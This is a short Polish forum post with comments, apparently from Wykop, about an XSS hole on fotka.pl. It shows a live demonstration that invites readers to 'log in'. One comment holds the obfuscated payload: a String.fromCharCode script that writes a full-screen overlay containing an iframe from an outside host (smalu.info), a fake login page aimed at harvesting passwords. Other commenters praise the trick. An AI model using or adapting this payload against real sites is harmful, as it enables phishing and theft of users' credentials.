Bład XSS na fotka.pl i jego ciekawe wykorzystanie
Spróbujcie się zalogować (dowolne hasło, dowolny nick). Ciekawe ile ludzi z tak dużej i specyficznej społeczności dało by się nabrać...(aby zobaczyć efekt potrzebny jest włączony javascript)
smalu z- #
- #
- #
- #
- #
- #
- #
- #
- 25
Komentarze (25)
najlepsze
Zapytanie: script>document.write String.fromCharCode 60,100,105,118,32,115,116,121,108,101,61,34,122,45,105,110,100,101,120,58,49,48,48,48,59,112,111,115,105,116,105,111,110,58,97,98,115,111,108,117,116,101,59,98,97,99,107,103,114,111,117,110,100,58,119,104,105,116,101,59,119,105,100,116,104,58,49,48,48,37,59,104,101,105,103,104,116,58,49,48,48,37,59,108,101,102,116,58,48,59,116,111,112,58,50,55,53,59,34,62,60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,115,109,97,108,117,46,105,110,102,111,47,102,111,116,107,97,105,102,114,97,109,101,46,104,116,109,108,34,32,115,116,121,108,101,61,34,119,105,100,116,104,58,49,48,48,37,59,104,101,105,103,104,116,58,49,48,48,37,59,98,111,114,100,101,114,58,110,111,110,101,59,34,47,62,60,47,100,105,118,62 ; /script>
Można wiedzieć co to ma robić bo nie wiem czy działa?
http://www.fotosik.pl/pokaz_obrazek/pelny/7c291eacecb103d9.html
Zna się chłopak na rzeczy
Zostaniesz pierwszym wkopany przez wykop
To pierwsza i jedyna luka, tylko wykorzystane inne ;]
A tak poza tym to dobry trick (:
A to, że błąd jest od dawna znany wiem, już w październiku informowałem administrację - jak widać - bez skutku.
edit: hmm..Cross Side Script...po mojemu CSS..ale to pewnie przez gorączkę;-)